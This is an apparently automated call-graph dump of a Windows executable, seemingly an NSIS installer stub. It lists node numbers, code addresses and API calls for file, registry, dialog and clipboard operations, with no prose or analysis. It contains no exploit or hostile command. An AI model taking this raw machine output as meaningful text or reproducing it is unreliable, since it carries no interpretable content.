GetMessagePos ScreenToClient SendMessageW 4626->4628 4630 4048cf 4627->4630 4629 4048d4 4628->4629 4628->4630 4629->4627 4630->4617 4631->4619 4632->4621 4633->4625 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4634 4020f9 GetDC GetDeviceCaps 4635 401446 18 API calls 4634->4635 4636 402116 MulDiv 4635->4636 4637 401446 18 API calls 4636->4637 4638 40212c 4637->4638 4639 406831 18 API calls 4638->4639 4640 402165 CreateFontIndirectW 4639->4640 4641 4030dc 4640->4641 4642 4030e3 4641->4642 4644 405f7d wsprintfW 4641->4644 4644->4642 4645 4024fb 4646 40145c 18 API calls 4645->4646 4647 402502 4646->4647 4648 40145c 18 API calls 4647->4648 4649 40250c 4648->4649 4650 40145c 18 API calls 4649->4650 4651 402515 4650->4651 4652 40145c 18 API calls 4651->4652 4653 40251f 4652->4653 4654 40145c 18 API calls 4653->4654 4655 402529 4654->4655 4656 40253d 4655->4656 4657 40145c 18 API calls 4655->4657 4658 4062cf 11 API calls 4656->4658 4657->4656 4659 40256a CoCreateInstance 4658->4659 4660 40258c 4659->4660 4661 4026fc 4663 402708 4661->4663 4664 401ee4 4661->4664 4662 406831 18 API calls 4662->4664 4664->4661 4664->4662 3808 4019fd 3809 40145c 18 API calls 3808->3809 3810 401a04 3809->3810 3813 405eab 3810->3813 3814 405eb8 GetTickCount GetTempFileNameW 3813->3814 3815 401a0b 3814->3815 3816 405eee 3814->3816 3816->3814 3816->3815 4665 4022fd 4666 40145c 18 API calls 4665->4666 4667 402304 GetFileVersionInfoSizeW 4666->4667 4668 4030e3 4667->4668 4669 40232b GlobalAlloc 4667->4669 4669->4668 4670 40233f GetFileVersionInfoW 4669->4670 4671 402350 VerQueryValueW 4670->4671 4672 402381 GlobalFree 4670->4672 4671->4672 4673 402369 4671->4673 4672->4668 4678 405f7d wsprintfW 4673->4678 4676 402375 4679 405f7d wsprintfW 4676->4679 4678->4676 4679->4672 4680 402afd 4681 40145c 18 API calls 4680->4681 4682 402b04 4681->4682 4687 405e7c GetFileAttributesW CreateFileW 4682->4687 4684 402b10 4685 4030e3 4684->4685 4688 405f7d wsprintfW 4684->4688 4687->4684 4688->4685 4689 4029ff 4690 401553 19 API calls 4689->4690 4691 402a09 4690->4691 4692 40145c 18 API calls 4691->4692 4693 402a12 4692->4693 4694 402a1f RegQueryValueExW 4693->4694 4698 401a13 4693->4698 4695 402a45 4694->4695 4696 402a3f 4694->4696 4697 4029e4 RegCloseKey 4695->4697 4695->4698 4696->4695 4700 405f7d wsprintfW 4696->4700 4697->4698 4700->4695 4701 401000 4702 401037 BeginPaint GetClientRect 4701->4702 4703 40100c DefWindowProcW 4701->4703 4705 4010fc 4702->4705 4706 401182 4703->4706 4707 401073 CreateBrushIndirect FillRect DeleteObject 4705->4707 4708 401105 4705->4708 4707->4705 4709 401170 EndPaint 4708->4709 4710 40110b CreateFontIndirectW 4708->4710 4709->4706 4710->4709 4711 40111b 6 API calls 4710->4711 4711->4709 4712 401f80 4713 401446 18 API calls 4712->4713 4714 401f88 4713->4714 4715 401446 18 API calls 4714->4715 4716 401f93 4715->4716 4717 401fa3 4716->4717 4718 40145c 18 API calls 4716->4718 4719 401fb3 4717->4719 4720 40145c 18 API calls 4717->4720 4718->4717 4721 402006 4719->4721 4722 401fbc 4719->4722 4720->4719 4723 40145c 18 API calls 4721->4723 4724 401446 18 API calls 4722->4724 4725 40200d 4723->4725 4726 401fc4 4724->4726 4728 40145c 18 API calls 4725->4728 4727 401446 18 API calls 4726->4727 4729 401fce 4727->4729 4730 402016 FindWindowExW 4728->4730 4731 401ff6 SendMessageW 4729->4731 4732 401fd8 SendMessageTimeoutW 4729->4732 4734 402036 4730->4734 4731->4734 4732->4734 4733 4030e3 4734->4733 4736 405f7d wsprintfW 4734->4736 4736->4733 4737 402880 4738 402884 4737->4738 4739 40145c 18 API calls 4738->4739 4740 4028a7 4739->4740 4741 40145c 18 API calls 4740->4741 4742 4028b1 4741->4742 4743 4028ba RegCreateKeyExW 4742->4743 4744 4028e8 4743->4744 4749 4029ef 4743->4749 4745 402934 4744->4745 4747 40145c 18 API calls 4744->4747 4746 402963 4745->4746 4748 401446 18 API calls 4745->4748 4750 4029ae RegSetValueExW 4746->4750 4753 40337f 33 API calls 4746->4753 4751 4028fc lstrlenW 4747->4751 4752 402947 4748->4752 4756 4029c6 RegCloseKey 4750->4756 4757 4029cb 4750->4757 4754 402918 4751->4754 4755 40292a 4751->4755 4759 4062cf 11 API calls 4752->4759 4760 40297b 4753->4760 4761 4062cf 11 API calls 4754->4761 4762 4062cf 11 API calls 4755->4762 4756->4749 4758 4062cf 11 API calls 4757->4758 4758->4756 4759->4746 4768 406250 4760->4768 4765 402922 4761->4765 4762->4745 4765->4750 4767 4062cf 11 API calls 4767->4765 4769 406273 4768->4769 4770 4062b6 4769->4770 4771 406288 wsprintfW 4769->4771 4772 402991 4770->4772 4773 4062bf lstrcatW 4770->4773 4771->4770 4771->4771 4772->4767 4773->4772 4774 403d02 4775 403d0d 4774->4775 4776 403d11 4775->4776 4777 403d14 GlobalAlloc 4775->4777 4777->4776 4778 402082 4779 401446 18 API calls 4778->4779 4780 402093 SetWindowLongW 4779->4780 4781 4030e3 4780->4781 4782 402a84 4783 401553 19 API calls 4782->4783 4784 402a8e 4783->4784 4785 401446 18 API calls 4784->4785 4786 402a98 4785->4786 4787 401a13 4786->4787 4788 402ab2 RegEnumKeyW 4786->4788 4789 402abe RegEnumValueW 4786->4789 4790 402a7e 4788->4790 4789->4787 4789->4790 4790->4787 4791 4029e4 RegCloseKey 4790->4791 4791->4787 4792 402c8a 4793 402ca2 4792->4793 4794 402c8f 4792->4794 4796 40145c 18 API calls 4793->4796 4795 401446 18 API calls 4794->4795 4798 402c97 4795->4798 4797 402ca9 lstrlenW 4796->4797 4797->4798 4799 401a13 4798->4799 4800 402ccb WriteFile 4798->4800 4800->4799 4801 401d8e 4802 40145c 18 API calls 4801->4802 4803 401d95 ExpandEnvironmentStringsW 4802->4803 4804 401da8 4803->4804 4805 401db9 4803->4805 4804->4805 4806 401dad lstrcmpW 4804->4806 4806->4805 4807 401e0f 4808 401446 18 API calls 4807->4808 4809 401e17 4808->4809 4810 401446 18 API calls 4809->4810 4811 401e21 4810->4811 4812 4030e3 4811->4812 4814 405f7d wsprintfW 4811->4814 4814->4812 4815 40438f 4816 4043c8 4815->4816 4817 40439f 4815->4817 4818 403df6 8 API calls 4816->4818 4819 403d6b 19 API calls 4817->4819 4821 4043d4 4818->4821 4820 4043ac SetDlgItemTextW 4819->4820 4820->4816 4822 403f90 4823 403fa0 4822->4823 4824 403fbc 4822->4824 4833 405cb0 GetDlgItemTextW 4823->4833 4826 403fc2 SHGetPathFromIDListW 4824->4826 4827 403fef 4824->4827 4829 403fd2 4826->4829 4832 403fd9 SendMessageW 4826->4832 4828 403fad SendMessageW 4828->4824 4830 40141d 80 API calls 4829->4830 4830->4832 4832->4827 4833->4828 4834 402392 4835 40145c 18 API calls 4834->4835 4836 402399 4835->4836 4839 407224 4836->4839 4840 406efe 25 API calls 4839->4840 4841 407244 4840->4841 4842 4023a7 4841->4842 4843 40724e lstrcpynW lstrcmpW 4841->4843 4844 407280 4843->4844 4845 407286 lstrcpynW 4843->4845 4844->4845 4845->4842 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4846 402797 4847 40145c 18 API calls 4846->4847 4848 4027ae 4847->4848 4849 40145c 18 API calls 4848->4849 4850 4027b7 4849->4850 4851 40145c 18 API calls 4850->4851 4852 4027c0 GetPrivateProfileStringW lstrcmpW 4851->4852 4853 401e9a 4854 40145c 18 API calls 4853->4854 4855 401ea1 4854->4855 4856 401446 18 API calls 4855->4856 4857 401eab wsprintfW 4856->4857 3817 401a1f 3818 40145c 18 API calls 3817->3818 3819 401a26 3818->3819 3820 4062cf 11 API calls 3819->3820 3821 401a49 3820->3821 3822 401a64 3821->3822 3823 401a5c 3821->3823 3892 406035 lstrcpynW 3822->3892 3891 406035 lstrcpynW 3823->3891 3826 401a6f 3893 40674e lstrlenW CharPrevW 3826->3893 3827 401a62 3830 406064 5 API calls 3827->3830 3861 401a81 3830->3861 3831 406301 2 API calls 3831->3861 3834 401a98 CompareFileTime 3834->3861 3835 401ba9 3836 404f9e 25 API calls 3835->3836 3838 401bb3 3836->3838 3837 401b5d 3839 404f9e 25 API calls 3837->3839 3870 40337f 3838->3870 3841 401b70 3839->3841 3845 4062cf 11 API calls 3841->3845 3843 406035 lstrcpynW 3843->3861 3844 4062cf 11 API calls 3846 401bda 3844->3846 3850 401b8b 3845->3850 3847 401be9 SetFileTime 3846->3847 3848 401bf8 CloseHandle 3846->3848 3847->3848 3848->3850 3851 401c09 3848->3851 3849 406831 18 API calls 3849->3861 3852 401c21 3851->3852 3853 401c0e 3851->3853 3854 406831 18 API calls 3852->3854 3855 406831 18 API calls 3853->3855 3856 401c29 3854->3856 3858 401c16 lstrcatW 3855->3858 3859 4062cf 11 API calls 3856->3859 3858->3856 3862 401c34 3859->3862 3860 401b50 3864 401b93 3860->3864 3865 401b53 3860->3865 3861->3831 3861->3834 3861->3835 3861->3837 3861->3843 3861->3849 3861->3860 3863 4062cf 11 API calls 3861->3863 3869 405e7c GetFileAttributesW CreateFileW 3861->3869 3896 405e5c GetFileAttributesW 3861->3896 3899 405ccc 3861->3899 3866 405ccc MessageBoxIndirectW 3862->3866 3863->3861 3867 4062cf 11 API calls 3864->3867 3868 4062cf 11 API calls 3865->3868 3866->3850 3867->3850 3868->3837 3869->3861 3871 40339a 3870->3871 3872 4033c7 3871->3872 3905 403368 SetFilePointer 3871->3905 3903 403336 ReadFile 3872->3903 3876 401bc6 3876->3844 3877 403546 3879 40354a 3877->3879 3880 40356e 3877->3880 3878 4033eb GetTickCount 3878->3876 3883 403438 3878->3883 3881 403336 ReadFile 3879->3881 3880->3876 3884 403336 ReadFile 3880->3884 3885 40358d WriteFile 3880->3885 3881->3876 3882 403336 ReadFile 3882->3883 3883->3876 3883->3882 3887 40348a GetTickCount 3883->3887 3888 4034af MulDiv wsprintfW 3883->3888 3890 4034f3 WriteFile 3883->3890 3884->3880 3885->3876 3886 4035a1 3885->3886 3886->3876 3886->3880 3887->3883 3889 404f9e 25 API calls 3888->3889 3889->3883 3890->3876 3890->3883 3891->3827 3892->3826 3894 401a75 lstrcatW 3893->3894 3895 40676b lstrcatW 3893->3895 3894->3827 3895->3894 3897 405e79 3896->3897 3898 405e6b SetFileAttributesW 3896->3898 3897->3861 3898->3897 3900 405ce1 3899->3900 3901 405d2f 3900->3901 3902 405cf7 MessageBoxIndirectW 3900->3902 3901->3861 3902->3901 3904 403357 3903->3904 3904->3876 3904->3877 3904->3878 3905->3872 4858 40209f GetDlgItem GetClientRect 4859 40145c 18 API calls 4858->4859 4860 4020cf LoadImageW SendMessageW 4859->4860 4861 4030e3 4860->4861 4862 4020ed DeleteObject 4860->4862 4862->4861 4863 402b9f 4864 401446 18 API calls 4863->4864 4868 402ba7 4864->4868 4865 402c4a 4866 402bdf ReadFile 4866->4868 4875 402c3d 4866->4875 4867 401446 18 API calls 4867->4875 4868->4865 4868->4866 4869 402c06 MultiByteToWideChar 4868->4869 4870 402c3f 4868->4870 4871 402c4f 4868->4871 4868->4875 4869->4868 4869->4871 4876 405f7d wsprintfW 4870->4876 4873 402c6b SetFilePointer 4871->4873 4871->4875 4873->4875 4874 402d17 ReadFile 4874->4875 4875->4865 4875->4867 4875->4874 4876->4865 4877 402b23 GlobalAlloc 4878 402b39 4877->4878 4879 402b4b 4877->4879 4880 401446 18 API calls 4878->4880 4881 40145c 18 API calls 4879->4881 4883 402b41 4880->4883 4882 402b52 WideCharToMultiByte lstrlenA 4881->4882 4882->4883 4884 402b84 WriteFile 4883->4884 4885 402b93 4883->4885 4884->4885 4886 402384 GlobalFree 4884->4886 4886->4885 4888 4040a3 4889 4040b0 lstrcpynW lstrlenW 4888->4889 4890 4040ad 4888->4890 4890->4889 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3643 405db4 3641->3643 3642->3643 3645 405daf CharNextW 3642->3645 3644 405dd8 3643->3644 3646 405d32 CharNextW 3643->3646 3644->3611 3645->3644 3646->3643 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4891 402da5 4892 4030e3 4891->4892 4893 402dac 4891->4893 4894 401446 18 API calls 4893->4894 4895 402db8 4894->4895 4896 402dbf SetFilePointer 4895->4896 4896->4892 4897 402dcf 4896->4897 4897->4892 4899 405f7d wsprintfW 4897->4899 4899->4892 4900 4049a8 GetDlgItem GetDlgItem 4901 4049fe 7 API calls 4900->4901 4906 404c16 4900->4906 4902 404aa2 DeleteObject 4901->4902 4903 404a96 SendMessageW 4901->4903 4904 404aad 4902->4904 4903->4902 4907 404ae4 4904->4907 4910 406831 18 API calls 4904->4910 4905 404cfb 4908 404da0 4905->4908 4909 404c09 4905->4909 4914 404d4a SendMessageW 4905->4914 4906->4905 4918 40487a 5 API calls 4906->4918 4931 404c86 4906->4931 4913 403d6b 19 API calls 4907->4913 4911 404db5 4908->4911 4912 404da9 SendMessageW 4908->4912 4915 403df6 8 API calls 4909->4915 4916 404ac6 SendMessageW SendMessageW 4910->4916 4923 404dc7 ImageList_Destroy 4911->4923 4924 404dce 4911->4924 4929 404dde 4911->4929 4912->4911 4919 404af8 4913->4919 4914->4909 4921 404d5f SendMessageW 4914->4921 4922 404f97 4915->4922 4916->4904 4917 404ced SendMessageW 4917->4905 4918->4931 4925 403d6b 19 API calls 4919->4925 4920 404f48 4920->4909 4930 404f5d ShowWindow GetDlgItem ShowWindow 4920->4930 4926 404d72 4921->4926 4923->4924 4927 404dd7 GlobalFree 4924->4927 4924->4929 4933 404b09 4925->4933 4935 404d83 SendMessageW 4926->4935 4927->4929 4928 404bd6 GetWindowLongW SetWindowLongW 4932 404bf0 4928->4932 4929->4920 4934 40141d 80 API calls 4929->4934 4944 404e10 4929->4944 4930->4909 4931->4905 4931->4917 4936 404bf6 ShowWindow 4932->4936 4937 404c0e 4932->4937 4933->4928 4939 404b65 SendMessageW 4933->4939 4940 404bd0 4933->4940 4942 404b93 SendMessageW 4933->4942 4943 404ba7 SendMessageW 4933->4943 4934->4944 4935->4908 4951 403dc4 SendMessageW 4936->4951 4952 403dc4 SendMessageW 4937->4952 4939->4933 4940->4928 4940->4932 4942->4933 4943->4933 4945 404e54 4944->4945 4948 404e3e SendMessageW 4944->4948 4946 404f1f InvalidateRect 4945->4946 4950 404ecd SendMessageW SendMessageW 4945->4950 4946->4920 4947 404f35 4946->4947 4949 4043d9 21 API calls 4947->4949 4948->4945 4949->4920 4950->4945 4951->4909 4952->4906 4953 4030a9 SendMessageW 4954 4030c2 InvalidateRect 4953->4954 4955 4030e3 4953->4955 4954->4955 3906 4038af #17 SetErrorMode OleInitialize 3907 406328 3 API calls 3906->3907 3908 4038f2 SHGetFileInfoW 3907->3908 3980 406035 lstrcpynW 3908->3980 3910 40391d GetCommandLineW 3981 406035 lstrcpynW 3910->3981 3912 40392f GetModuleHandleW 3913 403947 3912->3913 3914 405d32 CharNextW 3913->3914 3915 403956 CharNextW 3914->3915 3926 403968 3915->3926 3916 403a02 3917 403a21 GetTempPathW 3916->3917 3982 4037f8 